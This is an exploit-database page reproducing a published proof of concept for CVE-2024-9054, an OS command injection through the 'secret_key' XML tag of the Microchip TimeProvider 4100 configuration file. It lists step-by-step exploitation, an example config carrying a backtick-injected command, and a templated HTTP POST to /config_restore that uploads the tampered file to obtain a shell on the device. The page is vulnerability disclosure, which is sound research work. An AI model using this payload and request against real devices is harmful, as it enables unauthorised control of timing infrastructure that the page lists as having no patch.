header-logo
Suggest Exploit
vendor:
TimeProvider 4100
by:
Armando Huesca Prida
6.1
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: TimeProvider 4100
Affected Version From: Firmware release 1.0
Affected Version To: Firmware release 2.4.7
Patch Exists: NO
Related CWE: CVE-2024-9054
CPE: h:microchip:timeprovider_4100:2.4.6
Metasploit:
Other Scripts:
Platforms Tested:
2024

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 – OS Command Injection

A vulnerability exists in the 'secret_key' XML tag in Microchip TimeProvider 4100's configuration file, allowing remote code execution. By injecting a malicious payload into the configuration file and triggering it during login, an attacker can execute arbitrary OS commands remotely.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict access to the configuration files and ensure that they are not tampered with. Additionally, regular security audits and monitoring of the device's behavior can help in detecting any unauthorized changes.
Source

Exploit-DB raw data:

# Exploit Title: Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection

# Exploit Author: Armando Huesca Prida

# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

# Date of Disclosure: 27/06/2024

# Date of CVE Publication: 4/10/2024

# Exploit Publication: 10/10/2024

# Vendor Homepage: https://www.microchip.com/

# Version: Firmware release 1.0 through 2.4.7

# Tested on: Firmware release 2.3.12 

# CVE: CVE-2024-9054

# External References:

# URL: https://www.cve.org/cverecord?id=CVE-2024-9054

# URL: https://0xhuesca.com/2024/10/cve-2024-9054.html

# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file

# URL: https://www.gruppotim.it/it/footer/red-team.html





# Vulnerability Description:



A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution.





# Exploitation Steps:



1- Perform login into the device's management web interface.

2- Download the device's configuration file.

3- Substitute the "secret_key" value with the malicious payload.

4- Save the new configuration file containing the OS command to be executed.

5- Restore and submit the new configuration.

6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload.





# Example of malicious XML config file:



<?xml version="1.0"?>

[...]

 <security>

    [...]

	<server>

        	<ip>192.168.1.1</ip>

        	<secret_key>`ping 192.168.1.20`</secret_key>

        	[...]

      	</server>

    [...]

 </security>

[...]



# Proof of Concept - PoC:



Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request:

- [session cookie]

- [XML configuration file containing the injection on "secret_key" tag]

- [Web account password in clear-text]

- [device IP]





# Exploit - Restore and submit config file HTTP Request:



POST /config_restore HTTP/1.1

Host: [device IP]

Cookie: ci_session=[session cookie]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002

Content-Length: 206640

Origin: https://[device IP]

Referer: https://[device IP]/configbackuprestore

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

Te: trailers

Connection: keep-alive



-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"

Content-Type: text/plain



[XML configuration file containing the injection on "secret_key" tag]

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="pword"



[Web account password in clear-text]

-----------------------------182708909322642582691204887002--





# End

Navigation

Suggest Exploit

Services By CQR